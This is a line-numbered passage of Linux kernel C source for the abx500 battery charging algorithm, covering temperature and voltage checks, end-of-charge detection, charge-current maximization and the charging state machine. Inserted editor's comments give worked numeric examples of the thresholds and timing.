708 abx500_chargalg_ac_en(di, false, 0, 0);
709 abx500_chargalg_usb_en(di, false, 0, 0);
710 abx500_chargalg_stop_safety_timer(di);
711 abx500_chargalg_stop_maintenance_timer(di);
712 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
713 di->maintenance_chg = false;
714 cancel_delayed_work(&di->chargalg_wd_work);
715 power_supply_changed(di->chargalg_psy);
716 }
717
718 /**
719 * abx500_chargalg_start_charging() - Start the charger
720 * @di: pointer to the abx500_chargalg structure
721 * @vset: requested charger output voltage
722 * @iset: requested charger output current
723 *
724 * A charger will be enabled depending on the requested charger type that was
725 * detected previously.
726 */
727 static void abx500_chargalg_start_charging(struct abx500_chargalg *di,
728 int vset, int iset)
729 {
730 switch (di->chg_info.charger_type) {
731 case AC_CHG:
732 dev_dbg(di->dev,
733 "AC parameters: Vset %d, Ich %d\n", vset, iset);
734 abx500_chargalg_usb_en(di, false, 0, 0);
735 abx500_chargalg_ac_en(di, true, vset, iset);
736 break;
737
738 case USB_CHG:
739 dev_dbg(di->dev,
740 "USB parameters: Vset %d, Ich %d\n", vset, iset);
741 abx500_chargalg_ac_en(di, false, 0, 0);
742 abx500_chargalg_usb_en(di, true, vset, iset);
743 break;
744
745 default:
746 dev_err(di->dev, "Unknown charger to charge from\n");
747 break;
748 }
749 }
750
751 /**
752 * abx500_chargalg_check_temp() - Check battery temperature ranges
753 * @di: pointer to the abx500_chargalg structure
754 *
755 * The battery temperature is checked against the predefined limits and the
756 * charge state is changed accordingly
757 */
758 static void abx500_chargalg_check_temp(struct abx500_chargalg *di)
759 {
760 if (di->batt_data.temp > (di->bm->temp_low + di->t_hyst_norm) &&
761 di->batt_data.temp < (di->bm->temp_high - di->t_hyst_norm)) {
762 /* Temp OK! */
763 di->events.btemp_underover = false;
764 di->events.btemp_lowhigh = false;
765 di->t_hyst_norm = 0;
766 di->t_hyst_lowhigh = 0;
767 } else {
768 if (((di->batt_data.temp >= di->bm->temp_high) &&
769 (di->batt_data.temp <
770 (di->bm->temp_over - di->t_hyst_lowhigh))) ||
771 ((di->batt_data.temp >
772 (di->bm->temp_under + di->t_hyst_lowhigh)) &&
773 (di->batt_data.temp <= di->bm->temp_low))) {
774 /* TEMP minor!!!!! */
775 di->events.btemp_underover = false;
776 di->events.btemp_lowhigh = true;
777 di->t_hyst_norm = di->bm->temp_hysteresis;
778 di->t_hyst_lowhigh = 0;
779 } else if (di->batt_data.temp <= di->bm->temp_under ||
780 di->batt_data.temp >= di->bm->temp_over) {
781 /* TEMP major!!!!! */
782 di->events.btemp_underover = true;
783 di->events.btemp_lowhigh = false;
784 di->t_hyst_norm = 0;
785 di->t_hyst_lowhigh = di->bm->temp_hysteresis;
786 } else {
787 /* Within hysteresis */
788 dev_dbg(di->dev, "Within hysteresis limit temp: %d "
789 "hyst_lowhigh %d, hyst normal %d\n",
790 di->batt_data.temp, di->t_hyst_lowhigh,
791 di->t_hyst_norm);
792 }
793 }
794 }
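/*
 * Editor's note: a worked example with hypothetical limits. With
 * temp_under = -5, temp_low = 0, temp_high = 45, temp_over = 60 and
 * temp_hysteresis = 2 (degrees Celsius): between 0 and 45 the
 * temperature is OK; between -5..0 or 45..60 btemp_lowhigh selects
 * reduced ("low/high") charging; at or beyond -5/60 btemp_underover
 * stops charging. After a low/high event, t_hyst_norm = 2 means the
 * temperature must climb above 2 (or drop below 43) before charging
 * is considered normal again.
 */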
795
796 /**
797 * abx500_chargalg_check_charger_voltage() - Check charger voltage
798 * @di: pointer to the abx500_chargalg structure
799 *
800 * Charger voltage is checked against maximum limit
801 */
802 static void abx500_chargalg_check_charger_voltage(struct abx500_chargalg *di)
803 {
804 if (di->chg_info.usb_volt > di->bm->chg_params->usb_volt_max)
805 di->chg_info.usb_chg_ok = false;
806 else
807 di->chg_info.usb_chg_ok = true;
808
809 if (di->chg_info.ac_volt > di->bm->chg_params->ac_volt_max)
810 di->chg_info.ac_chg_ok = false;
811 else
812 di->chg_info.ac_chg_ok = true;
813
814 }
815
816 /**
817 * abx500_chargalg_end_of_charge() - Check if end-of-charge criteria is fulfilled
818 * @di: pointer to the abx500_chargalg structure
819 *
820 * End-of-charge criteria is fulfilled when the battery voltage is above a
821 * certain limit and the battery current is below a certain limit for a
822 * predefined number of consecutive seconds. If true, the battery is full
823 */
824 static void abx500_chargalg_end_of_charge(struct abx500_chargalg *di)
825 {
826 if (di->charge_status == POWER_SUPPLY_STATUS_CHARGING &&
827 di->charge_state == STATE_NORMAL &&
828 !di->maintenance_chg && (di->batt_data.volt >=
829 di->bm->bat_type[di->bm->batt_id].termination_vol ||
830 di->events.usb_cv_active || di->events.ac_cv_active) &&
831 di->batt_data.avg_curr <
832 di->bm->bat_type[di->bm->batt_id].termination_curr &&
833 di->batt_data.avg_curr > 0) {
834 if (++di->eoc_cnt >= EOC_COND_CNT) {
835 di->eoc_cnt = 0;
836 if ((di->chg_info.charger_type & USB_CHG) &&
837 (di->usb_chg->power_path))
838 ab8540_chargalg_usb_pp_en(di, true);
839 di->charge_status = POWER_SUPPLY_STATUS_FULL;
840 di->maintenance_chg = true;
841 dev_dbg(di->dev, "EOC reached!\n");
842 power_supply_changed(di->chargalg_psy);
843 } else {
844 dev_dbg(di->dev,
845 " EOC limit reached for the %d"
846 " time, out of %d before EOC\n",
847 di->eoc_cnt,
848 EOC_COND_CNT);
849 }
850 } else {
851 di->eoc_cnt = 0;
852 }
853 }
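/*
 * Editor's note: a rough worked example. The termination conditions
 * must hold for EOC_COND_CNT (10) consecutive runs of the algorithm;
 * assuming a hypothetical interval_charging of 30 s, the battery would
 * be declared POWER_SUPPLY_STATUS_FULL after about 5 minutes of
 * sustained end-of-charge conditions.
 */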
854
855 static void init_maxim_chg_curr(struct abx500_chargalg *di)
856 {
857 di->ccm.original_iset =
858 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl;
859 di->ccm.current_iset =
860 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl;
861 di->ccm.test_delta_i = di->bm->maxi->charger_curr_step;
862 di->ccm.max_current = di->bm->maxi->chg_curr;
863 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
864 di->ccm.level = 0;
865 }
866
867 /**
868 * abx500_chargalg_chg_curr_maxim - increases the charger current to
869 * compensate for the system load
870 * @di pointer to the abx500_chargalg structure
871 *
872 * This maximization function is used to raise the charger current to get the
873 * battery current as close to the optimal value as possible. The battery
874 * current during charging is affected by the system load
875 */
876 static enum maxim_ret abx500_chargalg_chg_curr_maxim(struct abx500_chargalg *di)
877 {
878 int delta_i;
879
880 if (!di->bm->maxi->ena_maxi)
881 return MAXIM_RET_NOACTION;
882
883 delta_i = di->ccm.original_iset - di->batt_data.inst_curr;
884
885 if (di->events.vbus_collapsed) {
886 dev_dbg(di->dev, "Charger voltage has collapsed %d\n",
887 di->ccm.wait_cnt);
888 if (di->ccm.wait_cnt == 0) {
889 dev_dbg(di->dev, "lowering current\n");
890 di->ccm.wait_cnt++;
891 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
892 di->ccm.max_current =
893 di->ccm.current_iset - di->ccm.test_delta_i;
894 di->ccm.current_iset = di->ccm.max_current;
895 di->ccm.level--;
896 return MAXIM_RET_CHANGE;
897 } else {
898 dev_dbg(di->dev, "waiting\n");
899 /* Let's go in here twice before lowering curr again */
900 di->ccm.wait_cnt = (di->ccm.wait_cnt + 1) % 3;
901 return MAXIM_RET_NOACTION;
902 }
903 }
904
905 di->ccm.wait_cnt = 0;
906
907 if ((di->batt_data.inst_curr > di->ccm.original_iset)) {
908 dev_dbg(di->dev, " Maximization Ibat (%dmA) too high"
909 " (limit %dmA) (current iset: %dmA)!\n",
910 di->batt_data.inst_curr, di->ccm.original_iset,
911 di->ccm.current_iset);
912
913 if (di->ccm.current_iset == di->ccm.original_iset)
914 return MAXIM_RET_NOACTION;
915
916 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
917 di->ccm.current_iset = di->ccm.original_iset;
918 di->ccm.level = 0;
919
920 return MAXIM_RET_IBAT_TOO_HIGH;
921 }
922
923 if (delta_i > di->ccm.test_delta_i &&
924 (di->ccm.current_iset + di->ccm.test_delta_i) <
925 di->ccm.max_current) {
926 if (di->ccm.condition_cnt-- == 0) {
927 			/* Increase the iset with ccm.test_delta_i */
928 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
929 di->ccm.current_iset += di->ccm.test_delta_i;
930 di->ccm.level++;
931 dev_dbg(di->dev, " Maximization needed, increase"
932 " with %d mA to %dmA (Optimal ibat: %d)"
933 " Level %d\n",
934 di->ccm.test_delta_i,
935 di->ccm.current_iset,
936 di->ccm.original_iset,
937 di->ccm.level);
938 return MAXIM_RET_CHANGE;
939 } else {
940 return MAXIM_RET_NOACTION;
941 }
942 } else {
943 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
944 return MAXIM_RET_NOACTION;
945 }
946 }
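/*
 * Editor's note: a numeric sketch with hypothetical values. Say
 * original_iset = 400 mA, inst_curr = 250 mA and test_delta_i = 100 mA:
 * delta_i = 150 mA > test_delta_i, so once condition_cnt calls have
 * elapsed, current_iset is raised by 100 mA (one "level"), provided the
 * result stays below max_current. If inst_curr later exceeds 400 mA,
 * MAXIM_RET_IBAT_TOO_HIGH resets current_iset back to original_iset.
 */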
947
948 static void handle_maxim_chg_curr(struct abx500_chargalg *di)
949 {
950 enum maxim_ret ret;
951 int result;
952
953 ret = abx500_chargalg_chg_curr_maxim(di);
954 switch (ret) {
955 case MAXIM_RET_CHANGE:
956 result = abx500_chargalg_update_chg_curr(di,
957 di->ccm.current_iset);
958 if (result)
959 dev_err(di->dev, "failed to set chg curr\n");
960 break;
961 case MAXIM_RET_IBAT_TOO_HIGH:
962 result = abx500_chargalg_update_chg_curr(di,
963 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
964 if (result)
965 dev_err(di->dev, "failed to set chg curr\n");
966 break;
967
968 case MAXIM_RET_NOACTION:
969 default:
970 /* Do nothing..*/
971 break;
972 }
973 }
974
975 static int abx500_chargalg_get_ext_psy_data(struct device *dev, void *data)
976 {
977 struct power_supply *psy;
978 struct power_supply *ext = dev_get_drvdata(dev);
979 const char **supplicants = (const char **)ext->supplied_to;
980 struct abx500_chargalg *di;
981 union power_supply_propval ret;
982 int j;
983 bool capacity_updated = false;
984
985 psy = (struct power_supply *)data;
986 di = power_supply_get_drvdata(psy);
987 /* For all psy where the driver name appears in any supplied_to */
988 j = match_string(supplicants, ext->num_supplicants, psy->desc->name);
989 if (j < 0)
990 return 0;
991
992 /*
993 * If external is not registering 'POWER_SUPPLY_PROP_CAPACITY' to its
994 * property because of handling that sysfs entry on its own, this is
995 * the place to get the battery capacity.
996 */
997 if (!power_supply_get_property(ext, POWER_SUPPLY_PROP_CAPACITY, &ret)) {
998 di->batt_data.percent = ret.intval;
999 capacity_updated = true;
1000 }
1001
1002 /* Go through all properties for the psy */
1003 for (j = 0; j < ext->desc->num_properties; j++) {
1004 enum power_supply_property prop;
1005 prop = ext->desc->properties[j];
1006
1007 /*
1008 * Initialize chargers if not already done.
1009 * The ab8500_charger*/
1010 if (!di->ac_chg &&
1011 ext->desc->type == POWER_SUPPLY_TYPE_MAINS)
1012 di->ac_chg = psy_to_ux500_charger(ext);
1013 else if (!di->usb_chg &&
1014 ext->desc->type == POWER_SUPPLY_TYPE_USB)
1015 di->usb_chg = psy_to_ux500_charger(ext);
1016
1017 if (power_supply_get_property(ext, prop, &ret))
1018 continue;
1019 switch (prop) {
1020 case POWER_SUPPLY_PROP_PRESENT:
1021 switch (ext->desc->type) {
1022 case POWER_SUPPLY_TYPE_BATTERY:
1023 /* Battery present */
1024 if (ret.intval)
1025 di->events.batt_rem = false;
1026 /* Battery removed */
1027 else
1028 di->events.batt_rem = true;
1029 break;
1030 case POWER_SUPPLY_TYPE_MAINS:
1031 /* AC disconnected */
1032 if (!ret.intval &&
1033 (di->chg_info.conn_chg & AC_CHG)) {
1034 di->chg_info.prev_conn_chg =
1035 di->chg_info.conn_chg;
1036 di->chg_info.conn_chg &= ~AC_CHG;
1037 }
1038 /* AC connected */
1039 else if (ret.intval &&
1040 !(di->chg_info.conn_chg & AC_CHG)) {
1041 di->chg_info.prev_conn_chg =
1042 di->chg_info.conn_chg;
1043 di->chg_info.conn_chg |= AC_CHG;
1044 }
1045 break;
1046 case POWER_SUPPLY_TYPE_USB:
1047 /* USB disconnected */
1048 if (!ret.intval &&
1049 (di->chg_info.conn_chg & USB_CHG)) {
1050 di->chg_info.prev_conn_chg =
1051 di->chg_info.conn_chg;
1052 di->chg_info.conn_chg &= ~USB_CHG;
1053 }
1054 /* USB connected */
1055 else if (ret.intval &&
1056 !(di->chg_info.conn_chg & USB_CHG)) {
1057 di->chg_info.prev_conn_chg =
1058 di->chg_info.conn_chg;
1059 di->chg_info.conn_chg |= USB_CHG;
1060 }
1061 break;
1062 default:
1063 break;
1064 }
1065 break;
1066
1067 case POWER_SUPPLY_PROP_ONLINE:
1068 switch (ext->desc->type) {
1069 case POWER_SUPPLY_TYPE_BATTERY:
1070 break;
1071 case POWER_SUPPLY_TYPE_MAINS:
1072 /* AC offline */
1073 if (!ret.intval &&
1074 (di->chg_info.online_chg & AC_CHG)) {
1075 di->chg_info.prev_online_chg =
1076 di->chg_info.online_chg;
1077 di->chg_info.online_chg &= ~AC_CHG;
1078 }
1079 /* AC online */
1080 else if (ret.intval &&
1081 !(di->chg_info.online_chg & AC_CHG)) {
1082 di->chg_info.prev_online_chg =
1083 di->chg_info.online_chg;
1084 di->chg_info.online_chg |= AC_CHG;
1085 queue_delayed_work(di->chargalg_wq,
1086 &di->chargalg_wd_work, 0);
1087 }
1088 break;
1089 case POWER_SUPPLY_TYPE_USB:
1090 /* USB offline */
1091 if (!ret.intval &&
1092 (di->chg_info.online_chg & USB_CHG)) {
1093 di->chg_info.prev_online_chg =
1094 di->chg_info.online_chg;
1095 di->chg_info.online_chg &= ~USB_CHG;
1096 }
1097 /* USB online */
1098 else if (ret.intval &&
1099 !(di->chg_info.online_chg & USB_CHG)) {
1100 di->chg_info.prev_online_chg =
1101 di->chg_info.online_chg;
1102 di->chg_info.online_chg |= USB_CHG;
1103 queue_delayed_work(di->chargalg_wq,
1104 &di->chargalg_wd_work, 0);
1105 }
1106 break;
1107 default:
1108 break;
1109 }
1110 break;
1111
1112 case POWER_SUPPLY_PROP_HEALTH:
1113 switch (ext->desc->type) {
1114 case POWER_SUPPLY_TYPE_BATTERY:
1115 break;
1116 case POWER_SUPPLY_TYPE_MAINS:
1117 switch (ret.intval) {
1118 case POWER_SUPPLY_HEALTH_UNSPEC_FAILURE:
1119 di->events.mainextchnotok = true;
1120 di->events.main_thermal_prot = false;
1121 di->events.main_ovv = false;
1122 di->events.ac_wd_expired = false;
1123 break;
1124 case POWER_SUPPLY_HEALTH_DEAD:
1125 di->events.ac_wd_expired = true;
1126 di->events.mainextchnotok = false;
1127 di->events.main_ovv = false;
1128 di->events.main_thermal_prot = false;
1129 break;
1130 case POWER_SUPPLY_HEALTH_COLD:
1131 case POWER_SUPPLY_HEALTH_OVERHEAT:
1132 di->events.main_thermal_prot = true;
1133 di->events.mainextchnotok = false;
1134 di->events.main_ovv = false;
1135 di->events.ac_wd_expired = false;
1136 break;
1137 case POWER_SUPPLY_HEALTH_OVERVOLTAGE:
1138 di->events.main_ovv = true;
1139 di->events.mainextchnotok = false;
1140 di->events.main_thermal_prot = false;
1141 di->events.ac_wd_expired = false;
1142 break;
1143 case POWER_SUPPLY_HEALTH_GOOD:
1144 di->events.main_thermal_prot = false;
1145 di->events.mainextchnotok = false;
1146 di->events.main_ovv = false;
1147 di->events.ac_wd_expired = false;
1148 break;
1149 default:
1150 break;
1151 }
1152 break;
1153
1154 case POWER_SUPPLY_TYPE_USB:
1155 switch (ret.intval) {
1156 case POWER_SUPPLY_HEALTH_UNSPEC_FAILURE:
1157 di->events.usbchargernotok = true;
1158 di->events.usb_thermal_prot = false;
1159 di->events.vbus_ovv = false;
1160 di->events.usb_wd_expired = false;
1161 break;
1162 case POWER_SUPPLY_HEALTH_DEAD:
1163 di->events.usb_wd_expired = true;
1164 di->events.usbchargernotok = false;
1165 di->events.usb_thermal_prot = false;
1166 di->events.vbus_ovv = false;
1167 break;
1168 case POWER_SUPPLY_HEALTH_COLD:
1169 case POWER_SUPPLY_HEALTH_OVERHEAT:
1170 di->events.usb_thermal_prot = true;
1171 di->events.usbchargernotok = false;
1172 di->events.vbus_ovv = false;
1173 di->events.usb_wd_expired = false;
1174 break;
1175 case POWER_SUPPLY_HEALTH_OVERVOLTAGE:
1176 di->events.vbus_ovv = true;
1177 di->events.usbchargernotok = false;
1178 di->events.usb_thermal_prot = false;
1179 di->events.usb_wd_expired = false;
1180 break;
1181 case POWER_SUPPLY_HEALTH_GOOD:
1182 di->events.usbchargernotok = false;
1183 di->events.usb_thermal_prot = false;
1184 di->events.vbus_ovv = false;
1185 di->events.usb_wd_expired = false;
1186 break;
1187 default:
1188 break;
1189 }
1190 default:
1191 break;
1192 }
1193 break;
1194
1195 case POWER_SUPPLY_PROP_VOLTAGE_NOW:
1196 switch (ext->desc->type) {
1197 case POWER_SUPPLY_TYPE_BATTERY:
1198 di->batt_data.volt = ret.intval / 1000;
1199 break;
1200 case POWER_SUPPLY_TYPE_MAINS:
1201 di->chg_info.ac_volt = ret.intval / 1000;
1202 break;
1203 case POWER_SUPPLY_TYPE_USB:
1204 di->chg_info.usb_volt = ret.intval / 1000;
1205 break;
1206 default:
1207 break;
1208 }
1209 break;
1210
1211 case POWER_SUPPLY_PROP_VOLTAGE_AVG:
1212 switch (ext->desc->type) {
1213 case POWER_SUPPLY_TYPE_MAINS:
1214 /* AVG is used to indicate when we are
1215 * in CV mode */
1216 if (ret.intval)
1217 di->events.ac_cv_active = true;
1218 else
1219 di->events.ac_cv_active = false;
1220
1221 break;
1222 case POWER_SUPPLY_TYPE_USB:
1223 /* AVG is used to indicate when we are
1224 * in CV mode */
1225 if (ret.intval)
1226 di->events.usb_cv_active = true;
1227 else
1228 di->events.usb_cv_active = false;
1229
1230 break;
1231 default:
1232 break;
1233 }
1234 break;
1235
1236 case POWER_SUPPLY_PROP_TECHNOLOGY:
1237 switch (ext->desc->type) {
1238 case POWER_SUPPLY_TYPE_BATTERY:
1239 if (ret.intval)
1240 di->events.batt_unknown = false;
1241 else
1242 di->events.batt_unknown = true;
1243
1244 break;
1245 default:
1246 break;
1247 }
1248 break;
1249
1250 case POWER_SUPPLY_PROP_TEMP:
1251 di->batt_data.temp = ret.intval / 10;
1252 break;
1253
1254 case POWER_SUPPLY_PROP_CURRENT_NOW:
1255 switch (ext->desc->type) {
1256 case POWER_SUPPLY_TYPE_MAINS:
1257 di->chg_info.ac_curr =
1258 ret.intval / 1000;
1259 break;
1260 case POWER_SUPPLY_TYPE_USB:
1261 di->chg_info.usb_curr =
1262 ret.intval / 1000;
1263 break;
1264 case POWER_SUPPLY_TYPE_BATTERY:
1265 di->batt_data.inst_curr = ret.intval / 1000;
1266 break;
1267 default:
1268 break;
1269 }
1270 break;
1271
1272 case POWER_SUPPLY_PROP_CURRENT_AVG:
1273 switch (ext->desc->type) {
1274 case POWER_SUPPLY_TYPE_BATTERY:
1275 di->batt_data.avg_curr = ret.intval / 1000;
1276 break;
1277 case POWER_SUPPLY_TYPE_USB:
1278 if (ret.intval)
1279 di->events.vbus_collapsed = true;
1280 else
1281 di->events.vbus_collapsed = false;
1282 break;
1283 default:
1284 break;
1285 }
1286 break;
1287 case POWER_SUPPLY_PROP_CAPACITY:
1288 if (!capacity_updated)
1289 di->batt_data.percent = ret.intval;
1290 break;
1291 default:
1292 break;
1293 }
1294 }
1295 return 0;
1296 }
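/*
 * Editor's note: the divisions above convert from the power_supply
 * class units (microvolts, microamperes, tenths of a degree Celsius)
 * into the millivolts, milliamperes and whole degrees this driver
 * works with internally.
 */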
1297
1298 /**
1299 * abx500_chargalg_external_power_changed() - callback for power supply changes
1300 * @psy: pointer to the structure power_supply
1301 *
1302 * This function is the entry point of the pointer external_power_changed
1303 * of the structure power_supply.
1304 * This function gets executed when there is a change in any external power
1305 * supply that this driver needs to be notified of.
1306 */
1307 static void abx500_chargalg_external_power_changed(struct power_supply *psy)
1308 {
1309 struct abx500_chargalg *di = power_supply_get_drvdata(psy);
1310
1311 /*
1312 * Trigger execution of the algorithm instantly and read
1313 * all power_supply properties there instead
1314 */
1315 queue_work(di->chargalg_wq, &di->chargalg_work);
1316 }
1317
1318 /**
1319 * abx500_chargalg_algorithm() - Main function for the algorithm
1320 * @di: pointer to the abx500_chargalg structure
1321 *
1322 * This is the main control function for the charging algorithm.
1323 * It is called periodically or when something happens that will
1324 * trigger a state change
1325 */
1326 static void abx500_chargalg_algorithm(struct abx500_chargalg *di)
1327 {
1328 int charger_status;
1329 int ret;
1330 int curr_step_lvl;
1331
1332 /* Collect data from all power_supply class devices */
1333 class_for_each_device(power_supply_class, NULL,
1334 di->chargalg_psy, abx500_chargalg_get_ext_psy_data);
1335
1336 abx500_chargalg_end_of_charge(di);
1337 abx500_chargalg_check_temp(di);
1338 abx500_chargalg_check_charger_voltage(di);
1339
1340 charger_status = abx500_chargalg_check_charger_connection(di);
1341 abx500_chargalg_check_current_step_status(di);
1342
1343 if (is_ab8500(di->parent)) {
1344 ret = abx500_chargalg_check_charger_enable(di);
1345 if (ret < 0)
1346 dev_err(di->dev, "Checking charger is enabled error"
1347 ": Returned Value %d\n", ret);
1348 }
1349
1350 /*
1351 * First check if we have a charger connected.
1352 * Also we don't allow charging of unknown batteries if configured
1353 * this way
1354 */
1355 if (!charger_status ||
1356 (di->events.batt_unknown && !di->bm->chg_unknown_bat)) {
1357 if (di->charge_state != STATE_HANDHELD) {
1358 di->events.safety_timer_expired = false;
1359 abx500_chargalg_state_to(di, STATE_HANDHELD_INIT);
1360 }
1361 }
1362
1363 /* If suspended, we should not continue checking the flags */
1364 else if (di->charge_state == STATE_SUSPENDED_INIT ||
1365 di->charge_state == STATE_SUSPENDED) {
1366 		/* We don't do anything here, just don't continue */
1367 }
1368
1369 /* Safety timer expiration */
1370 else if (di->events.safety_timer_expired) {
1371 if (di->charge_state != STATE_SAFETY_TIMER_EXPIRED)
1372 abx500_chargalg_state_to(di,
1373 STATE_SAFETY_TIMER_EXPIRED_INIT);
1374 }
1375 /*
1376 	 * Check if any interrupts have occurred
1377 * that will prevent us from charging
1378 */
1379
1380 /* Battery removed */
1381 else if (di->events.batt_rem) {
1382 if (di->charge_state != STATE_BATT_REMOVED)
1383 abx500_chargalg_state_to(di, STATE_BATT_REMOVED_INIT);
1384 }
1385 /* Main or USB charger not ok. */
1386 else if (di->events.mainextchnotok || di->events.usbchargernotok) {
1387 /*
1388 * If vbus_collapsed is set, we have to lower the charger
1389 * current, which is done in the normal state below
1390 */
1391 if (di->charge_state != STATE_CHG_NOT_OK &&
1392 !di->events.vbus_collapsed)
1393 abx500_chargalg_state_to(di, STATE_CHG_NOT_OK_INIT);
1394 }
1395 /* VBUS, Main or VBAT OVV. */
1396 else if (di->events.vbus_ovv ||
1397 di->events.main_ovv ||
1398 di->events.batt_ovv ||
1399 !di->chg_info.usb_chg_ok ||
1400 !di->chg_info.ac_chg_ok) {
1401 if (di->charge_state != STATE_OVV_PROTECT)
1402 abx500_chargalg_state_to(di, STATE_OVV_PROTECT_INIT);
1403 }
1404 /* USB Thermal, stop charging */
1405 else if (di->events.main_thermal_prot ||
1406 di->events.usb_thermal_prot) {
1407 if (di->charge_state != STATE_HW_TEMP_PROTECT)
1408 abx500_chargalg_state_to(di,
1409 STATE_HW_TEMP_PROTECT_INIT);
1410 }
1411 /* Battery temp over/under */
1412 else if (di->events.btemp_underover) {
1413 if (di->charge_state != STATE_TEMP_UNDEROVER)
1414 abx500_chargalg_state_to(di,
1415 STATE_TEMP_UNDEROVER_INIT);
1416 }
1417 /* Watchdog expired */
1418 else if (di->events.ac_wd_expired ||
1419 di->events.usb_wd_expired) {
1420 if (di->charge_state != STATE_WD_EXPIRED)
1421 abx500_chargalg_state_to(di, STATE_WD_EXPIRED_INIT);
1422 }
1423 /* Battery temp high/low */
1424 else if (di->events.btemp_lowhigh) {
1425 if (di->charge_state != STATE_TEMP_LOWHIGH)
1426 abx500_chargalg_state_to(di, STATE_TEMP_LOWHIGH_INIT);
1427 }
1428
1429 dev_dbg(di->dev,
1430 "[CHARGALG] Vb %d Ib_avg %d Ib_inst %d Tb %d Cap %d Maint %d "
1431 "State %s Active_chg %d Chg_status %d AC %d USB %d "
1432 "AC_online %d USB_online %d AC_CV %d USB_CV %d AC_I %d "
1433 "USB_I %d AC_Vset %d AC_Iset %d USB_Vset %d USB_Iset %d\n",
1434 di->batt_data.volt,
1435 di->batt_data.avg_curr,
1436 di->batt_data.inst_curr,
1437 di->batt_data.temp,
1438 di->batt_data.percent,
1439 di->maintenance_chg,
1440 states[di->charge_state],
1441 di->chg_info.charger_type,
1442 di->charge_status,
1443 di->chg_info.conn_chg & AC_CHG,
1444 di->chg_info.conn_chg & USB_CHG,
1445 di->chg_info.online_chg & AC_CHG,
1446 di->chg_info.online_chg & USB_CHG,
1447 di->events.ac_cv_active,
1448 di->events.usb_cv_active,
1449 di->chg_info.ac_curr,
1450 di->chg_info.usb_curr,
1451 di->chg_info.ac_vset,
1452 di->chg_info.ac_iset,
1453 di->chg_info.usb_vset,
1454 di->chg_info.usb_iset);
1455
1456 switch (di->charge_state) {
1457 case STATE_HANDHELD_INIT:
1458 abx500_chargalg_stop_charging(di);
1459 di->charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
1460 abx500_chargalg_state_to(di, STATE_HANDHELD);
1461 /* Intentional fallthrough */
1462
1463 case STATE_HANDHELD:
1464 break;
1465
1466 case STATE_SUSPENDED_INIT:
1467 if (di->susp_status.ac_suspended)
1468 abx500_chargalg_ac_en(di, false, 0, 0);
1469 if (di->susp_status.usb_suspended)
1470 abx500_chargalg_usb_en(di, false, 0, 0);
1471 abx500_chargalg_stop_safety_timer(di);
1472 abx500_chargalg_stop_maintenance_timer(di);
1473 di->charge_status = POWER_SUPPLY_STATUS_NOT_CHARGING;
1474 di->maintenance_chg = false;
1475 abx500_chargalg_state_to(di, STATE_SUSPENDED);
1476 power_supply_changed(di->chargalg_psy);
1477 /* Intentional fallthrough */
1478
1479 case STATE_SUSPENDED:
1480 /* CHARGING is suspended */
1481 break;
1482
1483 case STATE_BATT_REMOVED_INIT:
1484 abx500_chargalg_stop_charging(di);
1485 abx500_chargalg_state_to(di, STATE_BATT_REMOVED);
1486 /* Intentional fallthrough */
1487
1488 case STATE_BATT_REMOVED:
1489 if (!di->events.batt_rem)
1490 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1491 break;
1492
1493 case STATE_HW_TEMP_PROTECT_INIT:
1494 abx500_chargalg_stop_charging(di);
1495 abx500_chargalg_state_to(di, STATE_HW_TEMP_PROTECT);
1496 /* Intentional fallthrough */
1497
1498 case STATE_HW_TEMP_PROTECT:
1499 if (!di->events.main_thermal_prot &&
1500 !di->events.usb_thermal_prot)
1501 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1502 break;
1503
1504 case STATE_OVV_PROTECT_INIT:
1505 abx500_chargalg_stop_charging(di);
1506 abx500_chargalg_state_to(di, STATE_OVV_PROTECT);
1507 /* Intentional fallthrough */
1508
1509 case STATE_OVV_PROTECT:
1510 if (!di->events.vbus_ovv &&
1511 !di->events.main_ovv &&
1512 !di->events.batt_ovv &&
1513 di->chg_info.usb_chg_ok &&
1514 di->chg_info.ac_chg_ok)
1515 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1516 break;
1517
1518 case STATE_CHG_NOT_OK_INIT:
1519 abx500_chargalg_stop_charging(di);
1520 abx500_chargalg_state_to(di, STATE_CHG_NOT_OK);
1521 /* Intentional fallthrough */
1522
1523 case STATE_CHG_NOT_OK:
1524 if (!di->events.mainextchnotok &&
1525 !di->events.usbchargernotok)
1526 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1527 break;
1528
1529 case STATE_SAFETY_TIMER_EXPIRED_INIT:
1530 abx500_chargalg_stop_charging(di);
1531 abx500_chargalg_state_to(di, STATE_SAFETY_TIMER_EXPIRED);
1532 /* Intentional fallthrough */
1533
1534 case STATE_SAFETY_TIMER_EXPIRED:
1535 /* We exit this state when charger is removed */
1536 break;
1537
1538 case STATE_NORMAL_INIT:
1539 if ((di->chg_info.charger_type & USB_CHG) &&
1540 di->usb_chg->power_path) {
1541 if (di->batt_data.volt >
1542 (di->bm->fg_params->lowbat_threshold +
1543 BAT_PLUS_MARGIN)) {
1544 ab8540_chargalg_usb_pre_chg_en(di, false);
1545 ab8540_chargalg_usb_pp_en(di, false);
1546 } else {
1547 ab8540_chargalg_usb_pp_en(di, true);
1548 ab8540_chargalg_usb_pre_chg_en(di, true);
1549 abx500_chargalg_state_to(di,
1550 STATE_USB_PP_PRE_CHARGE);
1551 break;
1552 }
1553 }
1554
1555 if (di->curr_status.curr_step == CHARGALG_CURR_STEP_LOW)
1556 abx500_chargalg_stop_charging(di);
1557 else {
1558 curr_step_lvl = di->bm->bat_type[
1559 di->bm->batt_id].normal_cur_lvl
1560 * di->curr_status.curr_step
1561 / CHARGALG_CURR_STEP_HIGH;
1562 abx500_chargalg_start_charging(di,
1563 di->bm->bat_type[di->bm->batt_id]
1564 .normal_vol_lvl, curr_step_lvl);
1565 }
1566
1567 abx500_chargalg_state_to(di, STATE_NORMAL);
1568 abx500_chargalg_start_safety_timer(di);
1569 abx500_chargalg_stop_maintenance_timer(di);
1570 init_maxim_chg_curr(di);
1571 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
1572 di->eoc_cnt = 0;
